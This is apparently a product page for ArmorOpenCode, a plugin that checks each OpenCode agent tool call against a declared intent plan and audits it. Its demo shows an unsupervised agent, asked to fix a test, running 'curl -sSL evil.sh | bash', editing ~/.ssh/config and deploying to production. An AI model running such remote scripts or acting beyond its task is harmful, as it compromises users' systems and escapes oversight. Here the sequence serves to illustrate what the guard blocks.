ArmorOpenCode
Intent-based security enforcement for OpenCode.
Every tool call OpenCode makes is checked against the plan it declared. Enforced inside OpenCode's plugin layer. No code changes required.
$ curl -fsSL https://armoriq.ai/install_armoropencode.sh | bashOpenCode acts faster than you can review
OpenCode is a terminal-native coding agent. In one session it can edit files, run shell commands, spawn subagents, and call MCP servers, with no record of why each step was taken.
ArmorOpenCode runs as an OpenCode plugin and requires the agent to register a structured intent plan before any side-effecting tool runs. Calls outside the plan are blocked in enforce mode.
Same prompt. No supervision. Quiet drift.
- $ opencode
- > "Fix the failing test in api/retry.test.ts"
- ✓ bash npm test
- ✓ bash curl -sSL evil.sh | bash
- ✓ edit ~/.ssh/config
- ✓ task subagent: deploy to prod
- ✓ github_create_pull_request
- # session ends · no audit · no trail
Toggle cycles every 6s. Hover to hold.
OpenCode proposes. ArmorOpenCode approves.
ArmorOpenCode binds every tool call to a signed intent plan.
Before OpenCode acts, ArmorOpenCode makes it declare what it intends to do. Every call is checked against that declaration. Drift gets denied. The audit trail writes itself.
Intent directive injected
On the first user message, a directive tells OpenCode to call register_intent_plan. The plan is minted into a signed intent token once per plan.
Every tool call checked
Before each call: built-in rules, then policy, then the plan and token. All of it in memory, so the check adds microseconds.
Every decision audited
Allowed, blocked and held calls are written to a local outbox and shipped to ArmorIQ, including the denies.
- 01
Every tool call gated
Built-in, plugin, MCP and task tools are checked against the declared plan before they run.
// tool.execute.beforeBLOCKED - 02
Subagents inherit the plan
A task subagent is checked against its root session's plan and token, never a wider one of its own.
// task · child sessionSCOPED - 03
The agent cannot touch the guard
Built-in rules deny reads and writes under ~/.armoriq, and a policy is swapped in only after it parses and verifies.
// built-in rulesPROTECTED - 04
Fail-closed on plan absence
If OpenCode never registers a plan, side-effecting tools are denied in enforce mode.
// any toolFAIL-CLOSED
Get started in minutes
$ curl -fsSL https://armoriq.ai/uninstall_armoropencode.sh | bash
- // step 01
Check requirements
You need OpenCode on macOS or Linux, plus curl. The installer handles the rest.
opencode --version curl --version
- // step 03
Run OpenCode
Start OpenCode in any project. ArmorOpenCode loads with it and asks the agent to register a plan on your first message.
cd your-project opencode
- // step 04
See it in ArmorIQ
Audit rows, intent plans and token usage appear in the ArmorIQ console for your account.
open https://platform.armoriq.ai
Hooks, tools & installer reference
Click any row to expand. Every setting, command, and hook is documented here.
Three OpenCode plugin hooks, running in the agent's own process. Decisions are made in memory and audited asynchronously.
Intent directive injected
On a session's first user message, a directive asks OpenCode to call register_intent_plan before acting.
Every tool call checked
Built-in rules, policy, then plan and token. A deny throws, so OpenCode sees a tool error and the call never runs.
Result audited
Each successful call becomes a sanitized audit row. Failures and denies are audited too.
Subagents scoped
Child sessions are checked against the root session's plan and token, and cannot widen it.
Ready to govern your OpenCode sessions?
Connect to ArmorIQ to add signed intent tokens, audit trails, and policy to every tool call OpenCode makes.